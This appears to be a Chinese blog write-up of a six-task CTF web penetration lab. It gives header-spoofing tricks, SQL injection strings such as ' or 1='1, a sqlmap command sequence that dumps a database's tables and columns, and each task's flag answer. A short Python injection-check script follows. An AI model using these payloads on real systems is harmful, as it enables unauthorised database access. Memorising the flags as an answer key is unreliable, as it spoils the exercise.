WEB综合渗透

1.通过浏览器访问http://靶机IP/1,对该页面进行渗透测试,找到flag格式:flag{Xxxx123},括号中的内容作为flag值并提交;

通过burp抓包修改用户代理(User-Agent)

修改为 User-Agent:ERROR

 flag:zTdKVpUKJu

2.通过浏览器访问http://靶机IP/2,对该页面进行渗透测试,找到flag格式:flag{Xxxx123},括号中的内容作为flag值并提交;

通过burp抓包添加  X-Forwarded-For:192.168.1.1

flag:6i3zXHDPOx

3.通过浏览器访问http://靶机IP/3,对该页面进行渗透测试,找到flag格式:flag{Xxxx123},括号中的内容作为flag值并提交;

通过burp抓包添加SQL注入万能语句  ' or 1='1

flag:7Z9hwFpOlf

4.通过浏览器访问http://靶机IP/4,对该页面进行渗透测试,找到flag格式:flag{Xxxx123},括号中的内容作为flag值并提交;

通过burp抓包添加 ") or 1=1#                    #使用") # 符号过滤

flag:YbR0BlQEVo

5.通过浏览器访问http://靶机IP/5,对该页面进行渗透测试,找到flag格式:flag{Xxxx123},括号中的内容作为flag值并提交;

在URL中添加 ' oorr 1=1--+

flag:rNPco4KBLN

6.通过浏览器访问http://靶机IP/6,对该页面进行渗透测试,找到flag格式:flag{Xxxx123},括号中的内容作为flag值并提交;

详细步骤:

通过burp抓取POST数据包,并将信息保存为1.txt 

sqlmap -r 1.txt                     #检测是否存在注入点

sqlmap -r 1.txt --dbs                #爆破出所有数据库

sqlmap -r 1.txt -D hello --tables           #选择要爆破的数据库进行爆表操作

 

 sqlmap -r 1.txt -D hello -T user --columns           #确定表名,然后对字段进行爆破猜解

sqlmap -r 1.txt -D hello -T user -C id,username --dump              #爆破字段值

将id修改为2779/7269/8980,都可以获取flag

 

 

flag:C9K8TVwf7Z

### Web 渗透测试综合案例研究 #### 背景介绍 Web 应用程序的安全性至关重要,因为它们经常处理敏感数据成为攻击者的目标。渗透测试是一种评估这些应用程序安全性的重要手段。通过模拟真实的攻击场景,可以识别潜在漏洞采取相应的防护措施。 #### 综合案例分析 一个典型的 web 渗透测试项目可能涉及多个阶段的工作流程: 1. **情报收集** - 使用公开可用的信息源来获取目标系统的背景资料。 - 利用搜索引擎、社交媒体和其他在线平台寻找有关网站的技术细节和架构信息[^2]。 2. **威胁建模** - 基于已知的情报构建出合理的假设模型。 - 明确哪些部分最有可能受到攻击以及为什么。 3. **漏洞扫描** - 自动化工具用于检测常见缺陷,如 SQL 注入、跨站脚本(XSS)等。 - 手工审查代码逻辑以发现更深层次的问题。 4. **利用与验证** - 尝试利用找到的任何弱点来进行实际操作。 - 记录下每一步骤及其影响范围;确保所有行动都在授权范围内执行。 5. **报告撰写** - 编写详细的文档说明整个过程中的发现事项。 - 提供修复建议和技术指导给开发团队以便他们能够及时解决问题。 6. **后续跟进** - 定期复查之前指出过的风险点是否已被妥善解决。 - 更新内部安全政策以防止未来发生类似的事件。 ```python import requests def check_sql_injection(url): """简单SQL注入检查函数""" payload = "' OR '1'='1" response = requests.get(f"{url}?id={payload}") if "You have an error in your SQL syntax;" in response.text: print("[!] 可能存在SQL注入漏洞") else: print("[-] 未检测到明显的SQL注入迹象") check_sql_injection('http://example.com/vulnerable_page') ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

浩~~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值